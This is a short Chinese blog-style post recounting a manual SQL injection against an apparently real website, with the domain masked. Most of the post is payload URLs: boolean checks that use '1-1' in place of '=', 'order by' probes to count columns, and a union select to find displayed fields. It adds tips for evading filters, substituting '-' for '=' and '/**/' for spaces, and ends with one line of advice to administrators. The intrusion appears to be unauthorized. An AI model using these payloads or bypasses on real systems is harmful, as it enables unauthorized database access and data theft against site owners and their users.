今天手工注入某网站
xxx.com/pop_jyzd.php?id=102%20and%201-1
- -!明眼人一看就知道 我把-当=输入了。
但是结果显示错误页面
然后我顺手就把1改成2了。
xxx.com/pop_jyzd.php?id=102%20and%201-2
可是他返回正常页面
之后暴字段长度
xxx.com/pop_jyzd.php?id=102 and 1-1 order by 15 (把空格去掉大家看的清晰些)
错误页面,看来在15以内
xxx.com/pop_jyzd.php?id=102 and 1-1 order by 10
正常返回。接着在暴
xxx.com/pop_jyzd.php?id=102 and 1-1 order by 11
错误页面
看来在10以内。
那么接着暴可用字段
xxx.com/pop_jyzd.php?id=102 and 1-1 onion select 1,2,3,4,5,6,7,8,9,10
结果显示3,4,5,6
剩下就不多介绍了。。。。。猜数据库的连接名和猜表名等。。。
随后我用and 1=1 测试正常页面 and 1=2错误页面重复上面操作,结果不得行~~!
看来是过滤了。但是用-也可以代替=号的!
虽然没什么技术含量。但是这个觉的有时还是瞒有用的!因为很多工具采用的是and 1=1/2或or 1=1/2基本过滤=号的都可以采用这种方式- 或者过滤%20的话。也可以采用/**/代替空格!
建议网站管理人员直接取消脚本。别只过滤字符这样很容易被搞!
